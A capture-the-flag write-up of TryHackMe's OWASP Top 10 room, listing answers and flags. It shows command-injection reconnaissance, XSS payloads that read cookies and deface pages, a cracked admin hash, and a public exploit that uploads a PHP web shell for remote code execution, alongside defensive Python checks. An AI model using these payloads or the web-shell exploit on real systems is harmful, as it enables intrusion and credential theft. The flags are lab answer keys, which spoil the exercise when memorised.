DEV Community

Frank Osasere Idugboe

OWASP Top 10 - Write-up - TryHackMe

Information
Room
Name: OWASP Top 10
Profile: tryhackme.com
Difficulty: Easy
Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.

Write-up
Overview
Install the tools used in this write-up on BlackArch Linux:

$ sudo pacman -S exploitdb dbeaver python

Command Injection Practical
What strange text file is in the website root directory?

Answer: drpepper.txt

Issue the ls command to list files.

css drpepper.txt evilshell.php index.php js
How many non-root/non-service/non-daemon users are there?

Answer: 0

Issue the cat /etc/passwd command. There are no non-root/non-service/non-daemon users: every account listed is a system or daemon account, and none of them has an interactive login shell.

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
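As an added example (not part of the original write-up), this is the check behind the "non-root/non-service/non-daemon users" question, run over a handful of the passwd records above plus three constructed ones; the UID 1000 boundary follows the Debian/Ubuntu default and is an assumption.

```python
# Sample records: daemon, www-data, lxd, sshd and nobody are taken from the
# listing above; root, deploy and alice are constructed for this example.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
deploy:x:999:999::/opt/deploy:/bin/bash
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
"""

# Shells that never give an interactive login.
NO_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
# First UID handed to ordinary users (UID_MIN in Debian/Ubuntu login.defs); assumption.
FIRST_HUMAN_UID = 1000


def parse_passwd(text: str) -> list[tuple[str, int, str]]:
    """Return (name, uid, shell) for every well-formed 7-field record."""
    records = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # blank, comment or malformed line
        records.append((fields[0], int(fields[2]), fields[6]))
    return records


def human_users(text: str) -> list[str]:
    """Accounts that are neither root nor service/daemon accounts and can log in."""
    return [name for name, uid, shell in parse_passwd(text)
            if uid >= FIRST_HUMAN_UID and shell not in NO_LOGIN_SHELLS]


def service_accounts_with_shell(text: str) -> list[str]:
    """System accounts (UID 1..999) that still have a login shell: worth a second look."""
    return [name for name, uid, shell in parse_passwd(text)
            if 0 < uid < FIRST_HUMAN_UID and shell not in NO_LOGIN_SHELLS]


if __name__ == "__main__":
    print("human users:", human_users(SAMPLE_PASSWD))
    print("service accounts with a shell:", service_accounts_with_shell(SAMPLE_PASSWD))
```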

What user is this app running as?

Answer: www-data

Issue the id command.

uid=33(www-data) gid=33(www-data) groups=33(www-data)
What is the user's shell set as?

Answer: /usr/sbin/nologin

echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut -d ':' -f 7.

/usr/sbin/nologin

What version of Ubuntu is running?

Answer: 18.04.4

Run cat /etc/os-release.

VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

Print out the MOTD. What favorite beverage is shown?

Answer: Dr pepper

$ ls -1 /etc/update-motd.d/
10-help-text
50-landscape-sysinfo
50-motd-news
80-esm
80-livepatch
90-updates-available
91-release-upgrade
92-unattended-upgrades
95-hwe-eol
97-overlayroot
98-fsck-at-reboot
98-reboot-required

$ cat /etc/update-motd.d/00-header
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
 # Fall back to using the very slow lsb_release utility
 DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

DR PEPPER MAKES THE WORLD TASTE BETTER!

Broken Authentication Practical

What is the flag that you found in darren's account?

Register as darren and log in.

Answer: fe86079416a21a3c99937fea8874b667

What is the flag that you found in arthur's account?

Register as arthur and log in.

Answer: d9ac0f7db4fda460ac3edeb75d75e16e

Sensitive Data Exposure (Challenge)

Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

What is the name of the mentioned directory?

Answer: /assets

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Answer: webapp.db

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Answer: 6eea9b7ef19179a06954edd0f6c05ceb

Open the DB with dbeaver.

Crack the hash. What is the admin's plaintext password?

Answer: qwertyuiop

Crack the password with crackstation.

Log in as the admin. What is the flag?

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

XML External Entity - eXtensible Markup Language

Full form of XML

Answer: eXtensible Markup Language

Is it compulsory to have XML prolog in XML documents?

Answer: yes

Can we validate XML documents against a schema?

Answer: yes

How can we specify XML version and encoding in XML document?

Answer: XML Prolog

XML External Entity - DTD

How do you define a new ELEMENT?

Answer: !ELEMENT

How do you define a ROOT element?

Answer: !DOCTYPE

How do you define a new ENTITY?

Answer: !ENTITY

XML External Entity - Exploiting

What is the name of the user in /etc/passwd?

Answer: falcon

Where is falcon's SSH key located?

Answer: /home/falcon/.ssh/id_rsa

What are the first 18 characters of falcon's private key?

Answer: MIIEogIBAAKCAQEA7b

Broken Access Control (IDOR Challenge)

Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: flag{fivefourthree}

Security Misconfiguration

Hack into the webapp, and find the flag!

Answer: thm{4b9513968fd564a87b28aa1f9d672e17}

Cross-site Scripting

Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".

<script>alert("Hello")</script>

Answer: ThereIsMoreToXSSThanYouThink

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.

<script>alert(window.location.hostname)</script>

Answer: ReflectiveXss4TheWin

Now navigate to http://10.10.93.135/stored and make an account.

Then add a comment and see if you can insert some of your own HTML.

<b>noraj is bold</b>

Answer: HTML_T4gs

On the same page, create an alert popup box to appear on the page with your document cookies.

<script>alert(document.cookie)</script>

Answer: W3LL_D0N3_LVL2s

Change "XSS Playground" to "I am a hacker" by adding a comment and using JavaScript.

<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>

Answer: websites_can_be_easily_defaced_with_xss

Insecure Deserialization

Who developed the Tomcat application?

Answer: The Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialization?

Answer: denial of service

Insecure Deserialization - Objects

Select the correct term for the following statement:

Answer: A Behaviour

Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

Answer: binary

Insecure Deserialization - Cookies

If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?

Answer: webapp.com/login

What is the acronym for the web technology that Secure cookies work over?

Answer: HTTPS

Insecure Deserialization - Cookies Practical

1st flag (cookie value)

Answer: THM{good_old_base64_huh}

$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
}q(X	sessionIdqX c7dc44838e0847b1b45544948a92d194qX encodedflagqXTHM{good_old_base64_huh}qu.

The decoded cookie is not plain text but a binary Python pickle (it starts with the \x80\x03 protocol header); the readable strings are the session ID and the encoded flag.
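As an added example that is not from the write-up, here is the defensive counterpart of the decode above: the same cookie value is walked with pickletools before anything is unpickled, and a restricted unpickler refuses every global lookup; the OrderedDict cookie is a constructed, harmless stand-in for any pickle that references a class.

```python
import base64
import collections
import io
import pickle
import pickletools

# Cookie value as printed in the write-up: base64 of a Python pickle.
COOKIE = "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg=="
COOKIE_RAW = base64.b64decode(COOKIE)

# Constructed for this example: a pickle that references a class (collections.OrderedDict).
# Harmless here, but it exercises the same mechanism any unsafe pickle relies on.
CLASS_COOKIE = base64.b64encode(pickle.dumps(collections.OrderedDict(a=1))).decode()

# Opcodes that import names or call code while the stream is being loaded.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD", "INST", "OBJ",
                     "NEWOBJ", "NEWOBJ_EX", "EXT1", "EXT2", "EXT4"}


def opcode_names(raw: bytes) -> list[str]:
    """Disassemble the stream with pickletools; nothing is executed here."""
    return [op.name for op, _arg, _pos in pickletools.genops(raw)]


def dangerous_opcodes(raw: bytes) -> set[str]:
    return DANGEROUS_OPCODES & set(opcode_names(raw))


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so only builtin containers and scalars can load."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def load_cookie(cookie: str):
    """Decode and unpickle a session cookie, or raise if it could run code."""
    raw = base64.b64decode(cookie, validate=True)  # binascii.Error on junk input
    bad = dangerous_opcodes(raw)
    if bad:
        raise pickle.UnpicklingError(f"cookie contains {sorted(bad)}")
    return RestrictedUnpickler(io.BytesIO(raw)).load()


def is_rejected(cookie: str) -> bool:
    """True when load_cookie refuses the value."""
    try:
        load_cookie(cookie)
    except (pickle.UnpicklingError, ValueError):
        return True
    return False
```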

2nd flag (admin dashboard)

Answer: THM{heres_the_admin_flag}

Insecure Deserialization - Remote Code Execution

flag.txt

Answer: 4a69a7ff9fd68

Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Answer: 1611

$ searchsploit CSE bookstore
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                      | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                                           | php/webapps/48960.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit online book store
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities                                | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                                    | php/webapps/47922.txt
Online Book Store 1.0 - 'id' SQL Injection                                          | php/webapps/48775.txt
Online Book Store 1.0 - Arbitrary File Upload                                       | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution                       | php/webapps/47887.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 47887
  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
    URL: https://www.exploit-db.com/exploits/47887
     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
File Type: ASCII text, with CRLF line terminators

$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ wc -c /etc/passwd
1611 /etc/passwd

Insufficient Logging and Monitoring

What IP address is the attacker using?

Answer: 49.99.13.16

What kind of attack is being carried out?

Answer: brute force